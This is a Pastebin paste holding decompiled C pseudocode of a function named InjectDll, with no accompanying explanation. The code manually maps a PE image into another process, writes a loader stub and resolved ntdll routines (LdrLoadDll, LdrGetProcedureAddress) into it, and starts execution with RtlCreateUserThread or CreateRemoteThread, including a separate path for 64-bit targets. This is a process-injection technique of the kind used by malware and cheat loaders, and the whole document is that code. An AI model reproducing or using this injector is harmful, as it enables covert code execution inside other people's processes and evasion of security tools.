Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- char __cdecl InjectDll(HANDLE hProcess, LPCVOID lpAddress)
- {
- __int64 v3; // rax
- __int64 v4; // rax
- __int64 v5; // kr00_8
- __int64 v6; // rax
- _DWORD *v7; // edx
- __int64 v8; // rax
- __int64 v9; // rax
- __int64 v10; // rax
- __int64 v11; // rax
- __int64 v12; // rax
- HMODULE v13; // eax
- FARPROC v14; // [esp+Ch] [ebp-29Ch]
- FARPROC v15; // [esp+10h] [ebp-298h]
- FARPROC v16; // [esp+14h] [ebp-294h]
- FARPROC v17; // [esp+18h] [ebp-290h]
- __int64 v18; // [esp+1Ch] [ebp-28Ch]
- __int64 v19; // [esp+24h] [ebp-284h]
- __int64 v20; // [esp+2Ch] [ebp-27Ch]
- __int64 v21; // [esp+34h] [ebp-274h]
- LPCVOID v22; // [esp+3Ch] [ebp-26Ch]
- bool v23; // [esp+43h] [ebp-265h]
- struct _MEMORY_BASIC_INFORMATION v24; // [esp+44h] [ebp-264h]
- SIZE_T v25; // [esp+60h] [ebp-248h]
- bool v26; // [esp+67h] [ebp-241h]
- struct _MEMORY_BASIC_INFORMATION v27; // [esp+68h] [ebp-240h]
- SIZE_T v28; // [esp+84h] [ebp-224h]
- bool v29; // [esp+8Bh] [ebp-21Dh]
- struct _MEMORY_BASIC_INFORMATION v30; // [esp+8Ch] [ebp-21Ch]
- SIZE_T v31; // [esp+A8h] [ebp-200h]
- unsigned int v32; // [esp+ACh] [ebp-1FCh]
- char *v33; // [esp+B0h] [ebp-1F8h]
- unsigned int v34; // [esp+B4h] [ebp-1F4h]
- void *v35; // [esp+B8h] [ebp-1F0h]
- char v36; // [esp+BFh] [ebp-1E9h]
- struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+C0h] [ebp-1E8h]
- SIZE_T v38; // [esp+DCh] [ebp-1CCh]
- char v39; // [esp+E0h] [ebp-1C8h]
- HANDLE v40; // [esp+E8h] [ebp-1C0h]
- int v41; // [esp+ECh] [ebp-1BCh]
- FARPROC v42; // [esp+F0h] [ebp-1B8h]
- unsigned __int16 j; // [esp+F4h] [ebp-1B4h]
- struct _OSVERSIONINFOW VersionInformation; // [esp+F8h] [ebp-1B0h]
- LPCVOID lpBuffer; // [esp+218h] [ebp-90h]
- unsigned int i; // [esp+21Ch] [ebp-8Ch]
- __int64 v47; // [esp+220h] [ebp-88h]
- __int64 hObject; // [esp+238h] [ebp-70h]
- LPCVOID v49; // [esp+244h] [ebp-64h]
- __int64 hModule; // [esp+248h] [ebp-60h]
- char *v51; // [esp+250h] [ebp-58h]
- DWORD flOldProtect; // [esp+254h] [ebp-54h]
- int v53; // [esp+258h] [ebp-50h]
- int v54; // [esp+25Ch] [ebp-4Ch]
- char v55; // [esp+267h] [ebp-41h]
- __int64 v56; // [esp+268h] [ebp-40h]
- unsigned __int16 *v57; // [esp+270h] [ebp-38h]
- bool v58; // [esp+277h] [ebp-31h]
- _DWORD *v59; // [esp+278h] [ebp-30h]
- char v60; // [esp+27Fh] [ebp-29h]
- __int64 nSize; // [esp+280h] [ebp-28h]
- LPCVOID v62; // [esp+28Ch] [ebp-1Ch]
- char *v63; // [esp+290h] [ebp-18h]
- char *v64; // [esp+294h] [ebp-14h]
- __int64 lpBaseAddress; // [esp+298h] [ebp-10h]
- __int64 lpParameter; // [esp+2A0h] [ebp-8h]
- v60 = 0;
- v55 = 0;
- v58 = 0;
- flOldProtect = 0;
- hModule = 0i64;
- v53 = 0;
- v54 = 0;
- lpBaseAddress = 0i64;
- lpParameter = 0i64;
- v56 = 0i64;
- nSize = 0i64;
- v62 = 0;
- if ( !hProcess )
- return v60;
- v38 = VirtualQuery(lpAddress, &Buffer, 0x1Cu);
- if ( v38 )
- v36 = Buffer.Protect & 1 ? 0 : (Buffer.Protect & 0x100) == 0;
- else
- v36 = 0;
- if ( !v36 )
- return v60;
- v59 = lpAddress;
- if ( *(_WORD *)lpAddress != 23117 )
- return 0;
- v57 = (unsigned __int16 *)((char *)lpAddress + v59[15] + 4);
- if ( *v57 == 34404 )
- v55 = 1;
- if ( v55 )
- {
- sub_10001000();
- v56 = 1088i64;
- nSize = 56i64;
- v34 = 1088;
- v35 = VirtualAlloc(0, 0x441u, 0x3000u, 4u);
- if ( v35 && v35 && &unk_10025530 && v34 )
- qmemcpy(v35, &unk_10025530, v34);
- v62 = v35;
- v51 = (char *)lpAddress + v59[15];
- LODWORD(v3) = sub_10001B70(hProcess, 0, 0, *((_DWORD *)v51 + 20), 12288, 64);
- lpBaseAddress = v3;
- LODWORD(v4) = sub_10001B70(hProcess, 0, 0, nSize + v56, 12288, 64);
- lpParameter = v4;
- }
- else
- {
- v56 = 13839i64;
- nSize = 28i64;
- v32 = 13839;
- v33 = (char *)VirtualAlloc(0, 0x3610u, 0x3000u, 4u);
- if ( v33 && v33 && "éá" && v32 )
- qmemcpy(v33, "éá", v32);
- v62 = v33;
- v64 = (char *)lpAddress + v59[15];
- lpBaseAddress = (signed int)VirtualAllocEx(hProcess, 0, *((_DWORD *)v64 + 20), 0x3000u, 0x40u);
- lpParameter = (signed int)VirtualAllocEx(hProcess, 0, nSize + v56, 0x3000u, 0x40u);
- }
- if ( !lpBaseAddress || !lpParameter )
- return 0;
- v63 = 0;
- if ( v55 )
- {
- v63 = v51 + 264;
- if ( !sub_10001D20(hProcess, lpBaseAddress, HIDWORD(lpBaseAddress), lpAddress, *((_DWORD *)v51 + 21), 0) )
- return 0;
- for ( i = 0; i < *((unsigned __int16 *)v51 + 3); ++i )
- {
- if ( *(_DWORD *)&v63[40 * i + 16] )
- {
- v5 = lpBaseAddress + *(unsigned int *)&v63[40 * i + 12];
- if ( !sub_10001D20(
- hProcess,
- v5,
- HIDWORD(v5),
- (char *)lpAddress + *(_DWORD *)&v63[40 * i + 20],
- *(_DWORD *)&v63[40 * i + 16],
- 0) )
- return 0;
- }
- }
- v49 = (LPCVOID)sub_10013750(56);
- v31 = VirtualQuery(v49, &v30, 0x1Cu);
- if ( v31 )
- {
- if ( v30.Protect & 1 )
- v29 = 0;
- else
- v29 = (v30.Protect & 0x100) == 0;
- }
- else
- {
- v29 = 0;
- }
- if ( !v29 )
- return 0;
- LODWORD(v6) = sub_10001390(L"ntdll.dll");
- hModule = v6;
- if ( !v6 )
- return 0;
- v7 = v49;
- *(_DWORD *)v49 = lpBaseAddress;
- v7[1] = HIDWORD(lpBaseAddress);
- *((_QWORD *)v49 + 1) = lpBaseAddress + *((unsigned int *)v51 + 44);
- *((_QWORD *)v49 + 2) = lpBaseAddress + *((unsigned int *)v51 + 36);
- LODWORD(v8) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrLoadDll");
- v21 = v8;
- LODWORD(v8) = v49;
- *((_DWORD *)v49 + 6) = v21;
- *(_DWORD *)(v8 + 28) = HIDWORD(v21);
- if ( !v21 )
- return 0;
- LODWORD(v9) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrGetProcedureAddress");
- v20 = v9;
- LODWORD(v9) = v49;
- *((_DWORD *)v49 + 8) = v20;
- *(_DWORD *)(v9 + 36) = HIDWORD(v20);
- if ( !v20 )
- return 0;
- LODWORD(v10) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlInitAnsiString");
- v19 = v10;
- LODWORD(v10) = v49;
- *((_DWORD *)v49 + 10) = v19;
- *(_DWORD *)(v10 + 44) = HIDWORD(v19);
- if ( !v19 )
- return 0;
- LODWORD(v11) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUnicodeStringFromAsciiz");
- v18 = v11;
- LODWORD(v11) = v49;
- *((_DWORD *)v49 + 12) = v18;
- *(_DWORD *)(v11 + 52) = HIDWORD(v18);
- if ( !v18 )
- return 0;
- if ( !sub_10001D20(hProcess, lpParameter, HIDWORD(lpParameter), v49, nSize, 0) )
- return 0;
- if ( !sub_10001D20(hProcess, nSize + lpParameter, (unsigned __int64)(nSize + lpParameter) >> 32, v62, v56, 0) )
- return 0;
- v58 = sub_10001C50(hProcess, lpParameter, HIDWORD(lpParameter), 28, 32, &flOldProtect) != 0;
- LODWORD(v12) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUserThread");
- v47 = v12;
- if ( !v12 )
- return 0;
- if ( (signed int)sub_10001040(v47, SHIDWORD(v47), 10) >= 0 && hObject )
- CloseHandle((HANDLE)hObject);
- }
- else
- {
- v63 = v64 + 248;
- if ( !WriteProcessMemory(hProcess, (LPVOID)lpBaseAddress, lpAddress, *((_DWORD *)v64 + 21), 0) )
- return 0;
- for ( j = 0; j < (signed int)*((unsigned __int16 *)v64 + 3); ++j )
- {
- if ( *(_DWORD *)&v63[40 * j + 16]
- && !WriteProcessMemory(
- hProcess,
- (LPVOID)(*(_DWORD *)&v63[40 * j + 12] + lpBaseAddress),
- (char *)lpAddress + *(_DWORD *)&v63[40 * j + 20],
- *(_DWORD *)&v63[40 * j + 16],
- 0) )
- {
- return 0;
- }
- }
- lpBuffer = (LPCVOID)sub_10013750(28);
- v28 = VirtualQuery(lpBuffer, &v27, 0x1Cu);
- if ( v28 )
- {
- if ( v27.Protect & 1 )
- v26 = 0;
- else
- v26 = (v27.Protect & 0x100) == 0;
- }
- else
- {
- v26 = 0;
- }
- if ( !v26 )
- return 0;
- v13 = GetModuleHandleW(L"ntdll.dll");
- hModule = (signed int)v13;
- if ( !v13 )
- return 0;
- *(_DWORD *)lpBuffer = lpBaseAddress;
- *((_DWORD *)lpBuffer + 1) = lpBaseAddress + *((_DWORD *)v64 + 40);
- *((_DWORD *)lpBuffer + 2) = lpBaseAddress + *((_DWORD *)v64 + 32);
- v17 = GetProcAddress((HMODULE)hModule, "LdrLoadDll");
- *((_DWORD *)lpBuffer + 3) = v17;
- if ( !v17 )
- return 0;
- v16 = GetProcAddress((HMODULE)hModule, "LdrGetProcedureAddress");
- *((_DWORD *)lpBuffer + 4) = v16;
- if ( !v16 )
- return 0;
- v15 = GetProcAddress((HMODULE)hModule, "RtlInitAnsiString");
- *((_DWORD *)lpBuffer + 5) = v15;
- if ( !v15 )
- return 0;
- v14 = GetProcAddress((HMODULE)hModule, "RtlCreateUnicodeStringFromAsciiz");
- *((_DWORD *)lpBuffer + 6) = v14;
- if ( !v14 )
- return 0;
- if ( !WriteProcessMemory(hProcess, (LPVOID)lpParameter, lpBuffer, nSize, 0) )
- return 0;
- if ( !WriteProcessMemory(hProcess, (LPVOID)(nSize + lpParameter), v62, v56, 0) )
- return 0;
- v58 = VirtualProtectEx(hProcess, (LPVOID)lpParameter, 0x1Cu, 0x20u, &flOldProtect) != 0;
- v22 = &VersionInformation;
- v25 = VirtualQuery(&VersionInformation, &v24, 0x1Cu);
- if ( v25 )
- {
- if ( v24.Protect & 1 )
- v23 = 0;
- else
- v23 = (v24.Protect & 0x100) == 0;
- }
- else
- {
- v23 = 0;
- }
- if ( v23 )
- memset((void *)v22, 0, 0x9Cu);
- VersionInformation.dwOSVersionInfoSize = 284;
- GetVersionExW(&VersionInformation);
- if ( VersionInformation.dwMajorVersion > 5 )
- {
- v42 = GetProcAddress((HMODULE)hModule, "RtlCreateUserThread");
- v41 = ((int (__cdecl *)(HANDLE, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, HANDLE *, char *))v42)(
- hProcess,
- 0,
- 0,
- 0,
- 0,
- 0,
- nSize + lpParameter,
- lpParameter,
- &v40,
- &v39);
- if ( v41 < 0 )
- return 0;
- if ( v40 )
- CloseHandle(v40);
- }
- else if ( !CreateRemoteThread(
- hProcess,
- 0,
- 0,
- (LPTHREAD_START_ROUTINE)(nSize + lpParameter),
- (LPVOID)lpParameter,
- 0,
- 0) )
- {
- return 0;
- }
- }
- return 1;
- }
Add Comment
Please, Sign In to add comment